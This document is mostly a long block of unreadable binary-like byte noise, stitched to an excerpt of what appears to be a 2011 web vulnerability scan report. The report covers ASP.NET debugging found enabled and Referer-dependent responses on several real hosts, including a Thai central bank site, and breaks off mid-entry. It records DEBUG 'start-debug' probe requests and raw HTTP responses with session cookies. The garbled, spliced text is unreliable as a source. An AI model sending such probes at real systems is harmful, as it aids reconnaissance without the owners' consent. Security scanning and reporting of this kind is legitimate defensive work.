.(M..!m...|.B...$.[    :....v.].5.......hb...c5.rp...<}..3..]NU....@Op.2.L.<..x^.;BzhY&.....D..xM...)|...6....l.J...X....2.....0.W ...<.;..$..k}.aJ....yO.N..}7..o........v..2.v.....=.....T2.D.w.x`...Q....Y..s%c...^......[Z....f...E..j.......@.^.;.2..k...E.^..0........W...b..4;//...o.F..N...}.U..m.*.AQ.n.3F.j8......6j...c...g...6.]..&...w...v;.....?.ow.P3...:.U.    ..=..C}.....b]...wg..e..B4t.....$.........~9=...0.g.$.%c.8...h..3..|.....f6o..O631hw....2.WS._.vAC.\@..;.v..wZ}..5..n<...n.......t<..6.q.....u8..B%...r....p.`..#...'+..^......w..T&.....8.........1>.6.{......A.j0].....
`...,..& (.v...+......u..{...?.. ..A9z<...L.....1\....v{Q^.qG...zh..Q.....|u.p...44^....Y\....t{..._...O......~..>.b.;........k........ta..L(...9M8,,......_.+....Z.p..{w..y.j0Mx....c....et..3Z=V...X6.....N......pt&....B...L......($..c._N.+....@..H.`D...A......qT.....XWK....O(D....M....6rM.3..o?/........x...}.a.....J_looy.....dp....~.oDO.|.z.?]......>e.X..O.....U*...C...\..`].l_..$P..+**.2... S.....]"Bi........3e.....].=.=V}..}.v0V.|..G...{,..V..:..z.4...Sy3Aln.^.7......+3d....uyj..{........h<]..:,G..C/\...>..gouy./...m6..7.7[..9.7Yih,.+.
...N...Xv...W>=k....i.R}....X.....^....B..j......O...3........N.A....v........ ..f..-&.4....uQeU.....Y...%...J+\....\...B./...V...K.&...E../..wgt..$e..?.KM...r?....f.....~.-Y..H!.D.?...Z..H..N.1].zwv...6533...j.,lu..K....n.:_..0W.......Vt..~...j.hR..].u....;...Ui..Qu...........nn.n.WS@.........@P........5A...zU$.:G..*.~m.c.P1..rs......9.....P..R..jKm..~P[N.S...E.r..h@*-.rE.Ng.Q..=n..JMn...10.q..._.AB....Uz".p.r....]...2j..V..e6E....O....    /.j.UE.n.o.....r...;.....*..2...GZ..vk.j.J#./V.H..w........
..!.5.K......5%..jk.Z{......d......dF....].EA.W.k.[SS.....n..A..
.Zm..
........$z....sF...Cf.......(..9..I.O.(.......gIL..V....X..../.......{">....M4.^..z...]?..........@8....1+.z.........j....(..j..L........1|.....t6T
...o...1.."J4:.x2.F..v..<.'.....oJ.s>).....T:....
h.x.D&......C....IZ..j..._...U.1...'....S..U....G..G..9....'..U...+.........S#?..tX.q.r=C\.4C......$...Lg......]U..a..    8..*.....C..L.P+....r......4[^m...M,...I...f0........'.QNeq.u..Y.)...E`..g...O....P...#.cvG)..83K....d.|{Hc.'....:M..U....9...;....R.......S.8.........#    .....IbX..m4........n......Hr0!...= E.?...k.1..E.Md0>Q..>r.X......%..=..tE.    ...h.......Oz......hU...|....0..{........A.....L....U..}...6s...~.-..mf.....X8S..).*L.....H.Hkn\.)1.o...8.........'.7..;w-./....P.........&..*\.."XP...>A..^<....S;........=.^$...8.<.2..tq.|..    ..Y..Ri.&..4...v{?..#.a.    Y.&Vj.a.v"......y....w...*'LT....+<.7t....~w0F3.j.xP..zt.....:.=......u-GOf..'.;..jg.......8.....f.../....GOj....QM.h.SQ+..E.hL..gE..].j<
...O.B...`.B.`.C.Vb....rE
..s...Fr.....R..o..;@4...W.........l.A...%&..c......c.._,.{q.........G..;.5S/.-.....hY.8......b..ON[^.oQ.O..
8/.q..g..E%u..2.+.>.F2x..........w.G.........>y.S..._{8...|M/5......EF..Y...T..    .6.K.{!k...6HaB,..z......W...
....Tw...z.H.......1..W..dE.Ue.U..~x...H..bK....,.."....J....B......:`....}...c..2e.. .!.~.....?...pr....nvHDDv.f|..Po!...a...P.
..b....U..)q..I...%.Q.`..wm...I.B.....>.b.....z.=...JX....h._.+.......0.r.{-.9.$...~!92..~z..VH.$..k.0"}...'3...-L.$.3....D...4..ya.].R0....L;.w...-...~2Q8.z......u...]P<.c7...#..^hQ.8....".QX....\j...iMQ.....%...?./..e.Rf...M...V.>A ..`......%..X..q.k/..+....b...x.>XB.8......@...o....r....=0..O..%L5.[...&...:...W#...LT..f5..J.Lp....r..$.s|.k.w.<!....t...Z........g..q.~......ku..O..be.T....9.a..>.w@.a    .hE.....ttz,..v......X(.
..............i[>....1$........A.:.A.{....9....ZR...v..5q4Fp}`=....n..E.v...O.r+....7..x..H......,.;.N...O[8{t..n.8.0..<AXS.P.1...`<.w.4..e.A..N.................s_..g9...w......c./.6,F........_.-..|..I...C.3...+l<...Bo..~....%.7Lg..~.............p.............^..9..8T..H.....}...r.....'t...h.!...$;....\=@.k:...6...q_.u.&.u...D.tr..    .    .$..A./..P.pu%..E 0..si.....!C. ./....#...b..    .s.R....$.E#B.    .F;.0.U.p.    ...-...;.........7k&]Q.#$.9~.Ds..,s~....*D..1......g.t..$...Y>..}.........l.'7a.-...*L.s..1.j.,6P....n.fl..n..h...m...
;<.D..$".._.a/....q.P5..8.....f.q1../..s...{&.3u...X...A.L...w4....M.....}...a?&.%b..K.....P..n.Od.....?.4.NkBg...G........`rX..^H...._./......=...."..Y.sz_.c...>.wia.n.O..M.\<...b...:..B..o.._.o....
.*Y........]?..........".(F.e.@..m.G.........%.O..D...e!@.V#A=...H.$....h..6..L....!..Y.....a].R...u..uaB..?..L..[N..@[.Z.Q..|.[......c^.x......o^....p....C...tR.7.LG6....>..(...F.Q9...k.\....`.l...e.m..2n\....._.._..&...J......5+..rj. CJ..U...W....%i...;\...y.
3e6 $@.3.".-u..(..$dR..p.y.w....5.NWb..3.c.O.c...$2.~...?x1..>.rA.......&.........&.X..Q.T. .10.n[.>-.L..nu.3..;.Mo..1D..3.c...2d=L.|..f..a-....r.$......z[...j.6.va8~.$.....G.....    2..em...t.N...

x.
I..I4.b...[...xD$........?C.....].r...+P/..Vlj)W......    ..Q..X...........4H.%&..x.)..Fd\+c<..gJ..
.-
..e8........\...`......>2A.z....,.ym
..t.0..@.....?x..P~..+h..>..I..#l.&....d)..,..ve...'.k..Y.x..J.......,?.D.......7hPy3?......M!l+..`N.."l.a+......B.?..h.<Cr..k.h"K..u.81...NU.A......@f..<
.I....rRvl.M3..B.[......;j.=/...k.x
0......As8*./&{.5...rrv.!.P.VA...@A.'b~.@y..q.W.@y.8Z.%    ...{t..?.*ug..c..1.E........9..Y*#.+~`['.X. x.........z%[.ZoK......IQ.@..x.rv.$......W...._......>.GD...p.....R.S..3L.....q}.H....k..vF3.    .._26dZ.~.....?........x    ...    `K.....0A.......?.3v,uz.E.D..\    ..S....1~....&W.I,..,fh#...e..d..p...f.....B.    .EyfA...Xf.)B..8.Q.w`=5z....}`..=.L...PG..`K.9.n...n`"......a~...4a.a9......>..w.naa..T.L.~...Q........R|.... ..aE......."e.....;cD$.V..A.%KU..CV.~...@..O....'/.W*yX(g.x..
   .<.%....)4.Z.............40.%"!.].)..M.;.//...-jf4&d..N....W...'.."..w.?.=.1.+......g....E.3.H.U.A.4....`L.......$....t...OA..I.8q.An.<.S..5>9..M.|.i4    :.l...I..M....B.!h"N....>B?i.#....c.fU.W.v-./..    .m7...@.T.<F.cN[...v...    8RX.    ....(...y}wzc.N
.W..+y..Q4~.......o.n..2..SRn....er....8J_....;E..c.H..B....=....T...E}.-.JH.6.i.yYq.=3l)...V..D........H......Q....Gh;f.E........zY...Ibf...4.....y...L..l.|..$.tu#......._k..y7.......!.N.....N......x.......p9    ..]I....q.O.O............7.....}......G...>b......@n@.@.K...........0H.......@..C2...."..Cc...E'....`.P...m..$#g.R....._W.;.......{...@............. .Ge........[.I.......n.?{sKJ&(.........U>...Z.D{..n.p.......\..........n...L...Fd?.{..@......<m..3G......z.......~..y....D..Wc}...k.....7..M.#.&S......I..D.9
%...1W..<.)...|B._I...Bj..... .@..h}.,b.:._mu..U...N... ?j......W.'?q.3....X..'.3G].......j.a.}..7r..E5...M.......A3..#.<.M.f...}...`..........l..d$..V5..6..w1...o..i..yt.Y..T..B p..........r.#..-.m.`.^...V...dBD&....-....d...^..u....w.....K..0."u..j.T.3@..4P`.4%...<Q..G-.l.0..lA.0-..o.x.D.o..v..E........v.|+.....?.S...1.....U.0.......lG.&..~.R{.!..p...0J..Lc...9Us....q.V.....L.bkG..(..3.vC*...........]....[..{.bF"..fk.Q...&......x+7..fG.6gS......z..p{99.F.:>.Y.{....T.4.....ap....5..7..L...o...c5o..]....l.x...Q..........uNA.i....8'....../..t...E.....8p...u.pk..y..6...Zd..~...AJHu..S.....a..T>..:...h...K..Pc..i..l...
+Et1.Ga...&e(B.Xe.....v./.V..Yh..........s    $<..p...V`mDK....uR...;. ..\(.]oo..<z..v...o.k....M.@....2..iQ[...u..4.....2:;    .....9.....k:..y.&v.g.....C...~....c...C0....rt..........7.....>.#(.....8    .....C.%l..1}~..!#.....<.....D.b..- .L..z...r33.c..z....^... ....Z.&3R....R...|.....n......8nyyS..(..A......&..].]..3.\y...7.....WN..=X1.....Tj..3^......|
.]G..9
.0...F.).,.3.K..8..b."........K ;bh&..}..(.t.3...an.p_.s`....K0......d...x.\B..)..#[...@..&_..-........_......../3.BL..kH...%....,......
Y...N-.....`V...~..V....@..{b.R..b.#......G:..=s.!.    ..'.G...E.....TP...k.......8..g..r...h5..    .(..R........O...+..K5.+4 ....o.......... .h
.d..->..DRv<..$.Z0J..-4..j...]...M...2>............rs..g.d....'.g..:.....!.m..S......!`..T.9....../#. P...ZE.....)..y'e.0...K.H.uN=.2a~..Z?.P.\.G.(D............3H|zW...q..!.._...M...qC@i..%..I..=..P.I..@....;.m.h    zi.b.XT.^.-.....Q.._.... .."..e...'I..Vu...0.T.......h,....*.(Tf[......1......phD.h&...l. ..+F..P..........).Q.........}.s    ..H}.o....p....k...*E..#R...t9.\cM.....B.....t...w...s.......5....1.BuQ.    ........RG&.0...?..a|...k41.pR......-.u.,...............m...C... .N....lF..g.......:......k.b....6:.....$.V.....O.$.."Nl...)..#}.mA$M8........QY...oP...}.2.2......g....    /a0G..v...X.-.7..C.SF.u..,.M4mO.j.2.......2.....t......ew3..A{X......]...V~...p.<)V.P,..y.o-F%o!......d.wV..vXp;mM<.+..:.........)........~...?1...tX.    o.......K.U.....&..b...^.2......$H#i...>.....P.x.....'..@hc..s.#L..]...jb7..X.P_.....l...o5S0!.R.}^.0s.Tu..fK..s^......PR../......}l(...e..N...?%.m.....G6..-*.).6.W!.&..8..`.A..P....J....).+.j.,.S5...,.......Nl9 .......s.`......Y4gm..u..<...*9.B...W...#..>.... ..T.........1
.b.'...p.3..
=].mc....+.@........Fi.Q...-H...UIN..:..R.R.svJ..I.F......X..B.C.~y.=7y.72[2`k.....t..$.S.Rk.......JV.B'.!....1p&.5...5."C...$a.$....x..|.g....~..T..Q!..(1......m...b/.)..%D....'.\...D...{bIO,:...._1!s...e.uS...i..>.mP.......*T2...f.E......A.[....TR..7.4C.......I.%.0I....a...*^..7.Vc......~......#SZ........G..V......d.L..P.\..s.$..v#..F}...]KC.6..R..-.+...    (.._.~..46dj.!......e.YL..H.................&......a=h..u.fR..#.+.6.[....".QN?!........
......r.hi...........
zizyi.T...=g.... ...:ha.......H....~..    \4.Q.~....F.CH..y.jT..[..s.....$=...........!FC.~z.c....-....F....moYT.s9..c...T.?..].....w.......YV...bd`.. {...0N...uu6.Z.4..?..f%.).    %.s./.(....`...^..s....C...v...2|#..0..+..4nw.s..h.......T.&.*............>..s.j..d....Y......2..G....A..o..G..7.@......F6.D{..{nJY..@.^e...9.e....q....bG.X+.....0..*^)..".....`E..G)e....sM..'q..B..t.z...;u.Pg.I..iA..[P ..GRs..P..+......M.Vv..o.|%J..J:q    ..!l.;.l.q.{....<......e.q.n.....'O.[..a.K. v...o._.u.b...+....j..W.....g...o....9>.7............{.p......8.&.r...........%.8"....G..G....I..>`...Q..`.P......G.z>....=.A#.U.cz........[-.+..H.xk.l}.H......a..{.Gy./z..h..t.q..l_.j.&.7.O.>.....4d..I..GD.........6.d.#...~..V2,.....P..;...J*.9.x.~.............9^..]m....{..X&.... .7l.......``.kO...^.....b..~....'..t....XL/..... k.m.......R|..(.j.;. .....@G}.am.
.w.dm.. ..Xmzu%.o.........:_..B..Ds..eMk9z........n.U    .6-..x...S..........(.Q...N2.FJt2=%.K..3....A.?..........[.. .H.h&5.Y|u.A..?k.4n..b{.....6.W>..M.2..tS.'.|o..;..D=r|...0..........h..Y<)H.X...D....-.Oul..C,#u...-....@Ds..O.....q.......W.;.OuO.d..d>....R})..Zc.0p.x...M..N.M....#.@..3...T.}..-..W....M...cpxR#...m..q;_.l.so.r7....6z..{T.v.D8.P..*Ki#Kn....M......Np..y.^.....i*#.....Q    .......r..{....y......&QT..y...TpX....M....C.......`...&.&.5....^....~.:...n."1J.....f/~."$...S8..EKz..3m...zP.....+<.K0.U...:.4"...../*+J+.!..\2...(.T#.O.9...].......T. .D...l .4XEG{    ..{.%.}..V........,i..a... ./#.1&P.r+#...l....7...R8.%.......p.<d....z......=..4....p...+...:...........A..9.&.._.7.]...|......n.. K.8...?1...$P{v|w..@d..v2.o..]....2..30>..Vy....C......M..f..X...$.|........M......o...#.N..oE..*    ..0....t<)]....X6.`)......qS........m.....U'...L]    ..x.............v..+.....#.2....G..<v.N........C.r+.e..O$h...YO....7Q..Kv
..~..@ .QN."X.U..g3.&.W.j=W....h,H.......................    ].k..5.IM......#..e.._k.+,.e.._......A... ..../sU~.3.be.......N.P..O.5.....p.......o....^.VU(.|.b.c..
F.k.op...y|....n.o....Gq.[....h$:..l.#.,..{...B.L'...!ZM...U..._......L......_.......ll..EK.2mI!\G.G%."...E~...q.REE.......u&..x........Y;m]b.w..u ..>.....(>@......\.>.[K%.#.....Z...n..D..3....wp....&.Z..Q.....T..y.:7B...An1..?.Z.h...?>
.sl].b.V...Xb.`.._T(-.E...
.@.Ogs....V...H...........&t.`.v.....DK..4.....b..%HA.j...nl.p.D.5..A.,T....%A..q......wN*....
..3v...d_..V.Z...S.U..J..Z...|P>
...[SNIP]...

19. ASP.NET debugging enabled  previous  next
There are 4 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



19.1. http://dl.scriptlogic.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dl.scriptlogic.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: dl.scriptlogic.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 13:45:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19.2. http://register2.set.or.th/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://register2.set.or.th
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: register2.set.or.th
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:33:03 GMT
X-Powered-By: ASP.NET
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 39

Debug access denied to '/Default.aspx'.

19.3. http://www.bot.or.th/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bot.or.th
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.bot.or.th
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:44:07 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19.4. https://www.ktamsmarttrade.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ktamsmarttrade.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.ktamsmarttrade.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 12:53:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 39

Debug access denied to '/Default.aspx'.

20. Referer-dependent response  previous  next
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



20.1. http://weblink.settrade.com/banner/banner3.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://weblink.settrade.com
Path:   /banner/banner3.jsp

Request 1

GET /banner/banner3.jsp HTTP/1.1
Host: weblink.settrade.com
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:20 GMT
Set-Cookie: JSESSIONID=BDD4179830077099A80BF737DD7FE5F0.tcipo2; Path=/
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 17779


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0042)http://www.settrade.com/banner/banner3.jsp -->
<HTML><HEAD><TITLE>:: SETTRADE.COM ::</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<STYLE type=text/css>.time {
   FONT-SIZE: 9px; COLOR: #0055a5; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; LETTER-SPACING: -1px
}
.SMALLFONT {
   FONT-SIZE: 9px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif
}
.stock_red {
   FONT-SIZE: 9px; COLOR: #ff0000; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif
}
.stock_green {
   FONT-SIZE: 9px; COLOR: #009900; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif
}
.stock_yellow {
   FONT-SIZE: 9px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif
}
.line-gray70 {
   border-bottom:1px solid #636363;
}
.title_blue {
   FONT-SIZE: 9px; COLOR: #0055a5; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; LETTER-SPACING: 0px
}
.font_grey {
   FONT-SIZE: 9px; COLOR: #666666; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif
}
</STYLE>

<META content="MSHTML 6.00.2800.1106" name=GENERATOR>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n);
...[SNIP]...

Request 2

GET /banner/banner3.jsp HTTP/1.1
Host: weblink.settrade.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:43 GMT
Set-Cookie: JSESSIONID=C62E64322BC49244EA9B8CDDD0C9CCE4.tcipo2; Path=/
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 380


<html><head><META HTTP-EQUIV='Content-Type' CONTENT='text/html; charset=windows-874'></head><body leftmargin=0 topmargin=0><table border=0 width='100%' height='100%' align='center'><tr align='center'><td><font size='2'>...................... <br> ......................<br><hr>Please contact Settrade.com</font></td></tr></table></body></html>

20.2. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110503_0700%26ssh%3DS995825291%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.47.43
X-Cnection: close
Date: Tue, 03 May 2011 12:12:45 GMT
Content-Length: 8633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbff13d01e5e6663837229" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 210 others like this.</span><span class="connect_widget_not_connected_text">210 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see
...[SNIP]...

Request 2

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110503_0700%26ssh%3DS995825291%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.214.63
X-Cnection: close
Date: Tue, 03 May 2011 12:13:37 GMT
Content-Length: 8562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dbff17152a192730727141" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 214 others like this.</span><span class="connect_widget_not_connected_text">214 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

20.3. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scriptlogic.com
Path:   /sem/g/content/pt-wireless/070610

Request 1

